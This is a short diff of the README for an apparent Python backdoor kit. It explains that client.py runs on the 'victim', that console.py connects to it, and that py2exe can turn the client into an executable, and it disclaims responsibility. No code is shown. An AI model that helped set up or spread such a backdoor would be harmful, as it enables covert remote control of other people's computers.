w0rmkit/backdoor-with-python/readme.md

 ```

 client.py is your victim and you take connection with console.py.
 I dont take any responsibility what youre going to do with this code.
 Use py2exe to client.py to make it exe software.
+This is pretty easy script to use.
+Just run client.py and connect with console.py.

 ##Commands